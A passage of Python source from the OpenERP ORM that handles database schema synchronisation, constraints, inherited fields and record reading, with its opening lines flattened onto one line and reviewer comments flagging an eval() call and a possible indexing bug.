if res: f_pg_type = res['typname'] f_pg_size = res['size'] f_pg_notnull = res['attnotnull'] if isinstance(f, fields.function) and not f.store and\ not getattr(f, 'nodrop', False): _logger.info('column %s (%s) in table %s removed: converted to a function !\n', k, f.string, self._table) cr.execute('ALTER TABLE "%s" DROP COLUMN "%s" CASCADE' % (self._table, k)) cr.commit() _schema.debug("Table '%s': dropped column '%s' with cascade", self._table, k) f_obj_type = None else: f_obj_type = get_pg_type(f) and get_pg_type(f)[0] if f_obj_type: ok = False casts = [ ('text', 'char', pg_varchar(f.size), '::%s' % pg_varchar(f.size)), ('varchar', 'text', 'TEXT', ''), ('int4', 'float', get_pg_type(f)[1], '::'+get_pg_type(f)[1]), ('date', 'datetime', 'TIMESTAMP', '::TIMESTAMP'), ('timestamp', 'date', 'date', '::date'), ('numeric', 'float', get_pg_type(f)[1], '::'+get_pg_type(f)[1]), ('float8', 'float', get_pg_type(f)[1], '::'+get_pg_type(f)[1]), ] if f_pg_type == 'varchar' and f._type == 'char' and f_pg_size < f.size: cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO temp_change_size' % (self._table, k)) cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, pg_varchar(f.size))) cr.execute('UPDATE "%s" SET "%s"=temp_change_size::%s' % (self._table, k, pg_varchar(f.size))) cr.execute('ALTER TABLE "%s" DROP COLUMN temp_change_size CASCADE' % (self._table,)) cr.commit() _schema.debug("Table '%s': column '%s' (type varchar) changed size from %s to %s", self._table, k, f_pg_size, f.size) for c in casts: if (f_pg_type==c[0]) and (f._type==c[1]): if f_pg_type != f_obj_type: ok = True cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO temp_change_size' % (self._table, k)) cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, c[2])) cr.execute(('UPDATE "%s" SET "%s"=temp_change_size'+c[3]) % (self._table, k)) cr.execute('ALTER TABLE "%s" DROP COLUMN temp_change_size CASCADE' % (self._table,)) cr.commit() _schema.debug("Table '%s': column '%s' changed type from %s 
to %s", self._table, k, c[0], c[1]) break if f_pg_type != f_obj_type: if not ok: i = 0 while True: newname = k + '_moved' + str(i) cr.execute("SELECT count(1) FROM pg_class c,pg_attribute a " \ "WHERE c.relname=%s " \ "AND a.attname=%s " \ "AND c.oid=a.attrelid ", (self._table, newname)) if not cr.fetchone()[0]: break i += 1 if f_pg_notnull: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" DROP NOT NULL' % (self._table, k)) cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % (self._table, k, newname)) cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, get_pg_type(f)[1])) cr.execute("COMMENT ON COLUMN %s.\"%s\" IS %%s" % (self._table, k), (f.string,)) _schema.debug("Table '%s': column '%s' has changed type (DB=%s, def=%s), data moved to column %s !", self._table, k, f_pg_type, f._type, newname) # if the field is required and hasn't got a NOT NULL constraint if f.required and f_pg_notnull == 0: # set the field to the default value if any if k in self._defaults: if callable(self._defaults[k]): default = self._defaults[k](self, cr, SUPERUSER_ID, context) else: default = self._defaults[k] if (default is not None): ss = self._columns[k]._symbol_set query = 'UPDATE "%s" SET "%s"=%s WHERE "%s" is NULL' % (self._table, k, ss[0], k) cr.execute(query, (ss[1](default),)) # add the NOT NULL constraint cr.commit() try: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" SET NOT NULL' % (self._table, k), log_exceptions=False) cr.commit() _schema.debug("Table '%s': column '%s': added NOT NULL constraint", self._table, k) except Exception: msg = "Table '%s': unable to set a NOT NULL constraint on column '%s' !\n"\ "If you want to have it, you should update the records and execute manually:\n"\ "ALTER TABLE %s ALTER COLUMN %s SET NOT NULL" _schema.warning(msg, self._table, k, self._table, k) cr.commit() elif not f.required and f_pg_notnull == 1: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" DROP NOT NULL' % (self._table, k)) cr.commit() _schema.debug("Table '%s': 
column '%s': dropped NOT NULL constraint", self._table, k) # Verify index indexname = '%s_%s_index' % (self._table, k) cr.execute("SELECT indexname FROM pg_indexes WHERE indexname = %s and tablename = %s", (indexname, self._table)) res2 = cr.dictfetchall() if not res2 and f.select: cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (self._table, k, self._table, k)) cr.commit() if f._type == 'text': # FIXME: for fields.text columns we should try creating GIN indexes instead (seems most suitable for an ERP context) msg = "Table '%s': Adding (b-tree) index for text column '%s'."\ "This is probably useless (does not work for fulltext search) and prevents INSERTs of long texts"\ " because there is a length limit for indexable btree values!\n"\ "Use a search view instead if you simply want to make the field searchable." _schema.warning(msg, self._table, k, f._type) if res2 and not f.select: cr.execute('DROP INDEX "%s_%s_index"' % (self._table, k)) cr.commit() msg = "Table '%s': dropping index for column '%s' of type '%s' as it is not required anymore" _schema.debug(msg, self._table, k, f._type) if isinstance(f, fields.many2one): dest_model = self.pool.get(f._obj) if dest_model._table != 'ir_actions': self._m2o_fix_foreign_key(cr, self._table, k, dest_model, f.ondelete) # The field doesn't exist in database. Create it if necessary. 
else: if not isinstance(f, fields.function) or f.store: # add the missing field cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, get_pg_type(f)[1])) cr.execute("COMMENT ON COLUMN %s.\"%s\" IS %%s" % (self._table, k), (f.string,)) _schema.debug("Table '%s': added column '%s' with definition=%s", self._table, k, get_pg_type(f)[1]) # initialize it if not create and k in self._defaults: if callable(self._defaults[k]): default = self._defaults[k](self, cr, SUPERUSER_ID, context) else: default = self._defaults[k] ss = self._columns[k]._symbol_set query = 'UPDATE "%s" SET "%s"=%s' % (self._table, k, ss[0]) cr.execute(query, (ss[1](default),)) cr.commit() _logger.debug("Table '%s': setting default value of new column %s", self._table, k) # remember the functions to call for the stored fields if isinstance(f, fields.function): order = 10 if f.store is not True: # i.e. if f.store is a dict order = f.store[f.store.keys()[0]][2] todo_end.append((order, self._update_store, (f, k))) # and add constraints if needed if isinstance(f, fields.many2one): if not self.pool.get(f._obj): raise except_orm('Programming Error', ('There is no reference available for %s') % (f._obj,)) dest_model = self.pool.get(f._obj) ref = dest_model._table # ir_actions is inherited so foreign key doesn't work on it if ref != 'ir_actions': self._m2o_add_foreign_key_checked(k, dest_model, f.ondelete) if f.select: cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (self._table, k, self._table, k)) if f.required: try: cr.commit() cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" SET NOT NULL' % (self._table, k), log_exceptions=False) _schema.debug("Table '%s': column '%s': added a NOT NULL constraint", self._table, k) except Exception: msg = "WARNING: unable to set column %s of table %s not null !\n"\ "Try to re-run: openerp-server --update=module\n"\ "If it doesn't work, update records and execute manually:\n"\ "ALTER TABLE %s ALTER COLUMN %s SET NOT NULL" _logger.warning(msg, k, 
                            # (continuation: the _logger.warning(...) call opening this
                            # statement begins above this chunk, inside _auto_init)
                            self._table, self._table, k)
                        cr.commit()
        else:
            # Matching `if` is above this chunk: when there are no columns to
            # synchronize, only detect whether the table must still be created.
            cr.execute("SELECT relname FROM pg_class WHERE relkind IN ('r','v') AND relname=%s", (self._table,))
            create = not bool(cr.fetchone())

        cr.commit()     # start a new transaction

        self._add_sql_constraints(cr)

        if create:
            self._execute_sql(cr)

        if store_compute:
            self._parent_store_compute(cr)
            cr.commit()
        return todo_end

    def _auto_end(self, cr, context=None):
        """ Create the foreign keys recorded by _auto_init. """
        for t, k, r, d in self._foreign_keys:
            cr.execute('ALTER TABLE "%s" ADD FOREIGN KEY ("%s") REFERENCES "%s" ON DELETE %s' % (t, k, r, d))
        cr.commit()
        del self._foreign_keys

    def _table_exist(self, cr):
        """ Return a truthy rowcount if a table or view named self._table exists. """
        cr.execute("SELECT relname FROM pg_class WHERE relkind IN ('r','v') AND relname=%s", (self._table,))
        return cr.rowcount

    def _create_table(self, cr):
        """ Create the model's table with only the serial primary key.

        The remaining columns are added afterwards, column by column, during
        schema synchronization.
        """
        cr.execute('CREATE TABLE "%s" (id SERIAL NOT NULL, PRIMARY KEY(id)) WITHOUT OIDS' % (self._table,))
        cr.execute(("COMMENT ON TABLE \"%s\" IS %%s" % self._table), (self._description,))
        _schema.debug("Table '%s': created", self._table)

    def _parent_columns_exist(self, cr):
        """ Return a truthy rowcount if the nested-set columns already exist.

        Only parent_left is probed; parent_left/parent_right are always
        created together (see _create_parent_columns).
        """
        cr.execute("""SELECT c.relname
            FROM pg_class c, pg_attribute a
            WHERE c.relname=%s AND a.attname=%s AND c.oid=a.attrelid
            """, (self._table, 'parent_left'))
        return cr.rowcount

    def _create_parent_columns(self, cr):
        """ Add the parent_left/parent_right nested-set columns.

        Also logs errors when the model definition does not declare or index
        these columns properly, or when the parent link is not ondelete='cascade'.
        """
        cr.execute('ALTER TABLE "%s" ADD COLUMN "parent_left" INTEGER' % (self._table,))
        cr.execute('ALTER TABLE "%s" ADD COLUMN "parent_right" INTEGER' % (self._table,))
        if 'parent_left' not in self._columns:
            _logger.error('create a column parent_left on object %s: fields.integer(\'Left Parent\', select=1)', self._table)
            _schema.debug("Table '%s': added column '%s' with definition=%s", self._table, 'parent_left', 'INTEGER')
        elif not self._columns['parent_left'].select:
            _logger.error('parent_left column on object %s must be indexed! Add select=1 to the field definition)', self._table)
        if 'parent_right' not in self._columns:
            _logger.error('create a column parent_right on object %s: fields.integer(\'Right Parent\', select=1)', self._table)
            _schema.debug("Table '%s': added column '%s' with definition=%s", self._table, 'parent_right', 'INTEGER')
        elif not self._columns['parent_right'].select:
            _logger.error('parent_right column on object %s must be indexed! Add select=1 to the field definition)', self._table)
        if self._columns[self._parent_name].ondelete != 'cascade':
            _logger.error("The column %s on object %s must be set as ondelete='cascade'", self._parent_name, self._name)
        cr.commit()

    def _add_log_columns(self, cr):
        """ Ensure the audit columns listed in LOG_ACCESS_COLUMNS exist.

        LOG_ACCESS_COLUMNS maps column name -> SQL column definition.
        """
        for field, field_def in LOG_ACCESS_COLUMNS.iteritems():
            cr.execute("""
                SELECT c.relname
                FROM pg_class c, pg_attribute a
                WHERE c.relname=%s AND a.attname=%s AND c.oid=a.attrelid
                """, (self._table, field))
            if not cr.rowcount:
                cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, field, field_def))
                cr.commit()
                _schema.debug("Table '%s': added column '%s' with definition=%s",
                              self._table, field, field_def)

    def _select_column_data(self, cr):
        """ Return {column name: catalog row dict} for this model's table. """
        # attlen is the number of bytes necessary to represent the type when
        # the type has a fixed size. If the type has a varying size attlen is
        # -1 and atttypmod is the size limit + 4, or -1 if there is no limit.
        # Thus the query can return a negative size for a unlimited varchar.
        cr.execute("SELECT c.relname,a.attname,a.attlen,a.atttypmod,a.attnotnull,a.atthasdef,t.typname,CASE WHEN a.attlen=-1 THEN a.atttypmod-4 ELSE a.attlen END as size " \
            "FROM pg_class c,pg_attribute a,pg_type t " \
            "WHERE c.relname=%s " \
            "AND c.oid=a.attrelid " \
            "AND a.atttypid=t.oid", (self._table,))
        return dict(map(lambda x: (x['attname'], x),cr.dictfetchall()))

    def _o2m_raise_on_missing_reference(self, cr, f):
        """ Raise if the one2many field f points to a missing inverse field. """
        # TODO this check should be a method on fields.one2many.
        other = self.pool.get(f._obj)
        if other:
            # TODO the condition could use fields_get_keys().
            if f._fields_id not in other._columns.keys():
                if f._fields_id not in other._inherit_fields.keys():
                    raise except_orm('Programming Error', ("There is no reference field '%s' found for '%s'") % (f._fields_id, f._obj,))

    def _m2m_raise_or_create_relation(self, cr, f):
        """ Create the many2many relation table for field f if missing.

        Raises when the destination model is not registered in the pool.
        """
        m2m_tbl, col1, col2 = f._sql_names(self)
        cr.execute("SELECT relname FROM pg_class WHERE relkind IN ('r','v') AND relname=%s", (m2m_tbl,))
        if not cr.dictfetchall():
            if not self.pool.get(f._obj):
                raise except_orm('Programming Error', ('Many2Many destination model does not exist: `%s`') % (f._obj,))
            dest_model = self.pool.get(f._obj)
            ref = dest_model._table
            cr.execute('CREATE TABLE "%s" ("%s" INTEGER NOT NULL, "%s" INTEGER NOT NULL, UNIQUE("%s","%s")) WITH OIDS' % (m2m_tbl, col1, col2, col1, col2))

            # create foreign key references with ondelete=cascade, unless the targets are SQL views
            cr.execute("SELECT relkind FROM pg_class WHERE relkind IN ('v') AND relname=%s", (ref,))
            if not cr.fetchall():
                self._m2o_add_foreign_key_unchecked(m2m_tbl, col2, dest_model, 'cascade')
            cr.execute("SELECT relkind FROM pg_class WHERE relkind IN ('v') AND relname=%s", (self._table,))
            if not cr.fetchall():
                self._m2o_add_foreign_key_unchecked(m2m_tbl, col1, self, 'cascade')

            cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (m2m_tbl, col1, m2m_tbl, col1))
            cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (m2m_tbl, col2, m2m_tbl, col2))
            cr.execute("COMMENT ON TABLE \"%s\" IS 'RELATION BETWEEN %s AND %s'" % (m2m_tbl, self._table, ref))
            cr.commit()
            _schema.debug("Create table '%s': m2m relation between '%s' and '%s'", m2m_tbl, self._table, ref)

    def _add_sql_constraints(self, cr):
        """

        Modify this model's database table constraints so they match the one in
        _sql_constraints.
        """
        def unify_cons_text(txt):
            # Normalize a constraint definition so textual comparison with the
            # catalog's rendering (pg_get_constraintdef) is possible.
            return txt.lower().replace(', ',',').replace(' (','(')

        for (key, con, _) in self._sql_constraints:
            conname = '%s_%s' % (self._table, key)

            cr.execute("SELECT conname, pg_catalog.pg_get_constraintdef(oid, true) as condef FROM pg_constraint where conname=%s", (conname,))
            existing_constraints = cr.dictfetchall()

            sql_actions = {
                'drop': {
                    'execute': False,
                    'query': 'ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (self._table, conname, ),
                    'msg_ok': "Table '%s': dropped constraint '%s'. Reason: its definition changed from '%%s' to '%s'" % (
                        self._table, conname, con),
                    'msg_err': "Table '%s': unable to drop \'%s\' constraint !" % (self._table, con),
                    'order': 1,
                },
                'add': {
                    'execute': False,
                    'query': 'ALTER TABLE "%s" ADD CONSTRAINT "%s" %s' % (self._table, conname, con,),
                    'msg_ok': "Table '%s': added constraint '%s' with definition=%s" % (self._table, conname, con),
                    'msg_err': "Table '%s': unable to add \'%s\' constraint !\n If you want to have it, you should update the records and execute manually:\n%%s" % (
                        self._table, con),
                    'order': 2,
                },
            }

            if not existing_constraints:
                # constraint does not exists:
                sql_actions['add']['execute'] = True
                sql_actions['add']['msg_err'] = sql_actions['add']['msg_err'] % (sql_actions['add']['query'], )
            elif unify_cons_text(con) not in [unify_cons_text(item['condef']) for item in existing_constraints]:
                # constraint exists but its definition has changed:
                sql_actions['drop']['execute'] = True
                sql_actions['drop']['msg_ok'] = sql_actions['drop']['msg_ok'] % (existing_constraints[0]['condef'].lower(), )
                sql_actions['add']['execute'] = True
                sql_actions['add']['msg_err'] = sql_actions['add']['msg_err'] % (sql_actions['add']['query'], )

            # we need to add the constraint:
            # Run 'drop' before 'add' (sorted by 'order'); each action is
            # best-effort, rolled back individually on failure.
            sql_actions = [item for item in sql_actions.values()]
            sql_actions.sort(key=lambda x: x['order'])
            for sql_action in [action for action in sql_actions if action['execute']]:
                try:
                    cr.execute(sql_action['query'])
                    cr.commit()
                    _schema.debug(sql_action['msg_ok'])
                # NOTE(review): bare except also swallows SystemExit and
                # KeyboardInterrupt; `except Exception:` would be safer here.
                except:
                    _schema.warning(sql_action['msg_err'])
                    cr.rollback()

    def _execute_sql(self, cr):
        """ Execute the SQL code from the _sql attribute (if any)."""
        if hasattr(self, "_sql"):
            # Statements are split on ';' — assumes no literal ';' inside them.
            for line in self._sql.split(';'):
                line2 = line.replace('\n', '').strip()
                if line2:
                    cr.execute(line2)
                    cr.commit()

    #
    # Update objects that uses this one to update their _inherits fields
    #

    def _inherits_reload_src(self):
        """ Recompute the _inherit_fields mapping on each _inherits'd child model."""
        for obj in self.pool.models.values():
            if self._name in obj._inherits:
                obj._inherits_reload()

    def _inherits_reload(self):
        """ Recompute the _inherit_fields mapping.

        This will also call itself on each inherits'd child model.
        """
        res = {}
        for table in self._inherits:
            other = self.pool.get(table)
            for col in other._columns.keys():
                # value: (parent model, link field, column object, original parent)
                res[col] = (table, self._inherits[table], other._columns[col], table)
            for col in other._inherit_fields.keys():
                res[col] = (table, self._inherits[table], other._inherit_fields[col][2], other._inherit_fields[col][3])
        self._inherit_fields = res
        self._all_columns = self._get_column_infos()
        self._inherits_reload_src()

    def _get_column_infos(self):
        """Returns a dict mapping all fields names (direct fields and
           inherited field via _inherits) to a ``column_info`` struct
           giving detailed columns """
        result = {}
        for k, (parent, m2o, col, original_parent) in self._inherit_fields.iteritems():
            result[k] = fields.column_info(k, col, parent, m2o, original_parent)
        for k, col in self._columns.iteritems():
            # Direct columns take precedence over inherited ones of the same name.
            result[k] = fields.column_info(k, col)
        return result

    def _inherits_check(self):
        """ Validate the many2one link fields declared in _inherits.

        Auto-creates a missing link field, and forces required=True and
        ondelete='cascade' on an existing one that is not set up that way.
        """
        for table, field_name in self._inherits.items():
            if field_name not in self._columns:
                _logger.info('Missing many2one field definition for _inherits reference "%s" in "%s", using default one.', field_name, self._name)
                self._columns[field_name] = fields.many2one(table, string="Automatically created field to link to parent %s" % table,
                     required=True, ondelete="cascade")
            elif not self._columns[field_name].required or
                    self._columns[field_name].ondelete.lower() != "cascade":
                _logger.warning('Field definition for _inherits reference "%s" in "%s" must be marked as "required" with ondelete="cascade", forcing it.', field_name, self._name)
                self._columns[field_name].required = True
                self._columns[field_name].ondelete = "cascade"

    #def __getattr__(self, name):
    #    """
    #    Proxies attribute accesses to the `inherits` parent so we can call methods defined on the inherited parent
    #    (though inherits doesn't use Python inheritance).
    #    Handles translating between local ids and remote ids.
    #    Known issue: doesn't work correctly when using python's own super(), don't involve inherit-based inheritance
    #    when you have inherits.
    #    """
    #    for model, field in self._inherits.iteritems():
    #        proxy = self.pool.get(model)
    #        if hasattr(proxy, name):
    #            attribute = getattr(proxy, name)
    #            if not hasattr(attribute, '__call__'):
    #                return attribute
    #            break
    #    else:
    #        return super(orm, self).__getattr__(name)
    #
    #    def _proxy(cr, uid, ids, *args, **kwargs):
    #        objects = self.browse(cr, uid, ids, kwargs.get('context', None))
    #        lst = [obj[field].id for obj in objects if obj[field]]
    #        return getattr(proxy, name)(cr, uid, lst, *args, **kwargs)
    #
    #    return _proxy

    def fields_get(self, cr, user, allfields=None, context=None, write_access=True):
        """ Return the definition of each field.

        The returned value is a dictionary (indiced by field name) of
        dictionaries. The _inherits'd fields are included. The string, help,
        and selection (if present) attributes are translated.

        :param cr: database cursor
        :param user: current user id
        :param fields: list of fields
        :param context: context arguments, like lang, time zone
        :return: dictionary of field dictionaries, each one describing a field of the business object
        :raise AccessError: * if user has no create/write rights on the requested object
        """
        if context is None:
            context = {}

        # NOTE(review): the ``write_access`` parameter is immediately
        # overwritten here, so callers cannot actually influence it.
        write_access = self.check_write(cr, user, False) or \
            self.check_create(cr, user, False)

        res = {}

        translation_obj = self.pool.get('ir.translation')
        # Fields inherited through _inherits first; local columns may override.
        for parent in self._inherits:
            res.update(self.pool.get(parent).fields_get(cr, user, allfields, context))

        for f, field in self._columns.iteritems():
            if allfields and f not in allfields:
                continue

            res[f] = fields.field_to_dict(self, cr, user, field, context=context)

            if not write_access:
                res[f]['readonly'] = True
                res[f]['states'] = {}

            # Translate label / help / selection values for the context language.
            if 'string' in res[f]:
                res_trans = translation_obj._get_source(cr, user, self._name + ',' + f, 'field', context.get('lang', False) or 'en_US')
                if res_trans:
                    res[f]['string'] = res_trans
            if 'help' in res[f]:
                help_trans = translation_obj._get_source(cr, user, self._name + ',' + f, 'help', context.get('lang', False) or 'en_US')
                if help_trans:
                    res[f]['help'] = help_trans
            if 'selection' in res[f]:
                # Only static (tuple/list) selections can be translated here.
                if isinstance(field.selection, (tuple, list)):
                    sel = field.selection
                    sel2 = []
                    for key, val in sel:
                        val2 = None
                        if val:
                            val2 = translation_obj._get_source(cr, user, self._name + ',' + f, 'selection', context.get('lang', False) or 'en_US', val)
                        sel2.append((key, val2 or val))
                    res[f]['selection'] = sel2

        return res

    def read(self, cr, user, ids, fields=None, context=None, load='_classic_read'):
        """ Read records with given ids with the given fields

        :param cr: database cursor
        :param user: current user id
        :param ids: id or list of the ids of the records to read
        :param fields: optional list of field names to return (default: all fields would be returned)
        :type fields: list (example ['field_name_1', ...])
        :param context: optional context dictionary - it may contains
            keys for specifying certain options like ``context_lang``, ``context_tz`` to alter the results of the call.
            A special ``bin_size`` boolean flag may also be passed in the context to request the
            value of all fields.binary columns to be returned as the size of the binary instead of its
            contents. This can also be selectively overriden by passing a field-specific flag
            in the form ``bin_size_XXX: True/False`` where ``XXX`` is the name of the field.
            Note: The ``bin_size_XXX`` form is new in OpenERP v6.0.
        :return: list of dictionaries((dictionary per record asked)) with requested field values
        :rtype: [{‘name_of_the_field’: value, ...}, ...]
        :raise AccessError: * if user has no read rights on the requested object
                            * if user tries to bypass access rules for read on the requested object
        """
        if not context:
            context = {}
        self.check_read(cr, user)
        if not fields:
            fields = list(set(self._columns.keys() + self._inherit_fields.keys()))
        # Normalize ids to a flat list of integer ids (dicts are unwrapped).
        if isinstance(ids, (int, long)):
            select = [ids]
        else:
            select = ids
        select = map(lambda x: isinstance(x, dict) and x['id'] or x, select)
        result = self._read_flat(cr, user, select, fields, context, load)

        # SQL NULLs become False at the ORM level.
        for r in result:
            for key, v in r.items():
                if v is None:
                    r[key] = False

        # A scalar id in means a single record dict out.
        if isinstance(ids, (int, long, dict)):
            return result and result[0] or False
        return result

    def _read_flat(self, cr, user, ids, fields_to_read, context=None, load='_classic_read'):
        """ Low-level read: fetch SQL-backed fields, then _inherits fields,
        translations, symbol_get post-processing and function fields, and
        finally blank out values the user's groups may not read.
        """
        if not context:
            context = {}
        if not ids:
            return []
        if fields_to_read == None:
            fields_to_read = self._columns.keys()

        # Construct a clause for the security rules.
        # 'tables' hold the list of tables necessary for the SELECT including the ir.rule clauses,
        # or will at least contain self._table.
        rule_clause, rule_params, tables = self.pool.get('ir.rule').domain_get(cr, user, self._name, 'read', context=context)

        # all inherited fields + all non inherited fields for which the attribute whose name is in load is True
        fields_pre = [f for f in fields_to_read if
                          f == self.CONCURRENCY_CHECK_FIELD
                       or (f in self._columns and getattr(self._columns[f], '_classic_write'))
                     ] + self._inherits.values()

        res = []
        if len(fields_pre):
            def convert_field(f):
                # Build the SELECT expression for one column.
                f_qual = '%s."%s"' % (self._table, f) # need fully-qualified references in case len(tables) > 1
                if f in ('create_date', 'write_date'):
                    return "date_trunc('second', %s) as %s" % (f_qual, f)
                if f == self.CONCURRENCY_CHECK_FIELD:
                    if self._log_access:
                        return "COALESCE(%s.write_date, %s.create_date, (now() at time zone 'UTC'))::timestamp AS %s" % (self._table, self._table, f,)
                    return "(now() at time zone 'UTC')::timestamp AS %s" % (f,)
                if isinstance(self._columns[f], fields.binary) and context.get('bin_size', False):
                    # bin_size: return the blob's size instead of its content.
                    return 'length(%s) as "%s"' % (f_qual, f)
                return f_qual

            fields_pre2 = map(convert_field, fields_pre)
            order_by = self._parent_order or self._order
            select_fields = ','.join(fields_pre2 + [self._table + '.id'])
            query = 'SELECT %s FROM %s WHERE %s.id IN %%s' % (select_fields, ','.join(tables), self._table)
            if rule_clause:
                query += " AND " + (' OR '.join(rule_clause))
            query += " ORDER BY " + order_by
            for sub_ids in cr.split_for_in_conditions(ids):
                if rule_clause:
                    cr.execute(query, [tuple(sub_ids)] + rule_params)
                    # Fewer rows than requested ids means an ir.rule filtered
                    # some out (or they were deleted) -> access error.
                    if cr.rowcount != len(sub_ids):
                        raise except_orm(_('AccessError'),
                                         _('Operation prohibited by access rules, or performed on an already deleted document (Operation: read, Document type: %s).')
                                         % (self._description,))
                else:
                    cr.execute(query, (tuple(sub_ids),))
                res.extend(cr.dictfetchall())
        else:
            res = map(lambda x: {'id': x}, ids)

        # Overlay translated values for translatable stored fields.
        for f in fields_pre:
            if f == self.CONCURRENCY_CHECK_FIELD:
                continue
            if self._columns[f].translate:
                ids = [x['id'] for x in res]
                #TODO: optimize out of this loop
                res_trans = self.pool.get('ir.translation')._get_ids(cr, user, self._name+','+f, 'model', context.get('lang', False) or 'en_US', ids)
                for r in res:
                    r[f] = res_trans.get(r['id'], False) or r[f]

        # Read fields coming from _inherits parents via the link column.
        for table in self._inherits:
            col = self._inherits[table]
            cols = [x for x in intersect(self._inherit_fields.keys(), fields_to_read) if x not in self._columns.keys()]
            if not cols:
                continue
            res2 = self.pool.get(table).read(cr, user, [x[col] for x in res], cols, context, load)

            res3 = {}
            for r in res2:
                res3[r['id']] = r
                del r['id']

            for record in res:
                if not record[col]: # if the record is deleted from _inherits table?
                    continue
                record.update(res3[record[col]])
                if col not in fields_to_read:
                    del record[col]

        # all fields which need to be post-processed by a simple function (symbol_get)
        fields_post = filter(lambda x: x in self._columns and self._columns[x]._symbol_get, fields_to_read)
        if fields_post:
            for r in res:
                for f in fields_post:
                    r[f] = self._columns[f]._symbol_get(r[f])
        ids = [x['id'] for x in res]

        # all non inherited fields for which the attribute whose name is in load is False
        fields_post = filter(lambda x: x in self._columns and not getattr(self._columns[x], load), fields_to_read)

        # Compute POST fields
        # Group function fields by their _multi key so multi-fields are
        # computed in one call.
        todo = {}
        for f in fields_post:
            todo.setdefault(self._columns[f]._multi, [])
            todo[self._columns[f]._multi].append(f)
        for key, val in todo.items():
            if key:
                res2 = self._columns[val[0]].get(cr, self, ids, val, user, context=context, values=res)
                assert res2 is not None, \
                    'The function field "%s" on the "%s" model returned None\n' \
                    '(a dictionary was expected).' % (val[0], self._name)
                for pos in val:
                    for record in res:
                        # NOTE(review): eval() of a DB-sourced string is unsafe;
                        # kept as-is pending the TOCHECK below.
                        if isinstance(res2[record['id']], str): res2[record['id']] = eval(res2[record['id']]) #TOCHECK : why got string instend of dict in python2.6
                        multi_fields = res2.get(record['id'],{})
                        if multi_fields:
                            record[pos] = multi_fields.get(pos,[])
            else:
                for f in val:
                    res2 = self._columns[f].get(cr, self, ids, f, user, context=context, values=res)
                    for record in res:
                        if res2:
                            record[f] = res2[record['id']]
                        else:
                            record[f] = []

        # Blank out field values the user's groups are not allowed to read
        # (per-field `read` group restrictions).
        readonly = None
        for vals in res:
            for field in vals.copy():
                fobj = None
                if field in self._columns:
                    fobj = self._columns[field]

                if not fobj:
                    continue
                groups = fobj.read
                if groups:
                    edit = False
                    for group in groups:
                        module = group.split(".")[0]
                        grp = group.split(".")[1]
                        cr.execute("select count(*) from res_groups_users_rel where gid IN (select res_id from ir_model_data where name=%s and module=%s and model=%s) and uid=%s", \
                                   (grp, module, 'res.groups', user))
                        readonly = cr.fetchall()
                        if readonly[0][0] >= 1:
                            edit = True
                            break
                        elif readonly[0][0] == 0:
                            edit = False
                        else:
                            edit = False

                    if not edit:
                        # Replace the value by a type-appropriate placeholder.
                        if type(vals[field]) == type([]):
                            vals[field] = []
                        elif type(vals[field]) == type(0.0):
                            vals[field] = 0
                        elif type(vals[field]) == type(''):
                            vals[field] = '=No Permission='
                        else:
                            vals[field] = False
        return res

    # TODO check READ access
    def perm_read(self, cr, user, ids, context=None, details=True):
        """
        Returns some metadata about the given records.
        :param details: if True, \*_uid fields are replaced with the name of the user
        :return: list of ownership dictionaries for each requested record
        :rtype: list of dictionaries with the following keys:

            * id: object id
            * create_uid: user who created the record
            * create_date: date when the record was created
            * write_uid: last user who changed the record
            * write_date: date of the last change to the record
            * xmlid: XML ID to use to refer to this record (if there is one), in format ``module.name``
        """
        if not context:
            context = {}
        if not ids:
            return []
        fields = ''
        uniq = isinstance(ids, (int, long))
        if uniq:
            ids = [ids]
        fields = ['id']
        if self._log_access:
            fields += ['create_uid', 'create_date', 'write_uid', 'write_date']
        quoted_table = '"%s"' % self._table
        fields_str = ",".join('%s.%s'%(quoted_table, field) for field in fields)
        # LEFT JOIN on ir_model_data to recover the record's XML ID, if any.
        query = '''SELECT %s, __imd.module, __imd.name
                   FROM %s LEFT JOIN ir_model_data __imd
                       ON (__imd.model = %%s and __imd.res_id = %s.id)
                   WHERE %s.id IN %%s''' % (fields_str, quoted_table, quoted_table, quoted_table)
        cr.execute(query, (self._name, tuple(ids)))
        res = cr.dictfetchall()
        for r in res:
            for key in r:
                r[key] = r[key] or False
                if details and key in ('write_uid', 'create_uid') and r[key]:
                    try:
                        r[key] = self.pool.get('res.users').name_get(cr, user, [r[key]])[0]
                    except Exception:
                        pass # Leave the numeric uid there
            r['xmlid'] = ("%(module)s.%(name)s" % r) if r['name'] else False
            del r['name'], r['module']
        if uniq:
            # NOTE(review): indexing by the record id looks suspicious —
            # presumably res[0] was intended; confirm before changing.
            return res[ids[0]]
        return res

    def _check_concurrency(self, cr, ids, context):
        """ Raise a ConcurrencyException if any record in ids was modified
        after the timestamp the client recorded in
        context[CONCURRENCY_CHECK_FIELD]. No-op without that context key or
        without _log_access.
        """
        if not context:
            return
        if not (context.get(self.CONCURRENCY_CHECK_FIELD) and self._log_access):
            return
        check_clause = "(id = %s AND %s < COALESCE(write_date, create_date, (now() at time zone 'UTC'))::timestamp)"
        for sub_ids in cr.split_for_in_conditions(ids):
            ids_to_check = []
            for id in sub_ids:
                id_ref = "%s,%s" % (self._name, id)
                # pop(): each client-side timestamp is consumed once.
                update_date = context[self.CONCURRENCY_CHECK_FIELD].pop(id_ref, None)
                if update_date:
                    ids_to_check.extend([id, update_date])
            if not ids_to_check:
                continue
            cr.execute("SELECT id FROM %s WHERE %s" % (self._table, " OR ".join([check_clause]*(len(ids_to_check)/2))), tuple(ids_to_check))
            res = cr.fetchone()
            if res:
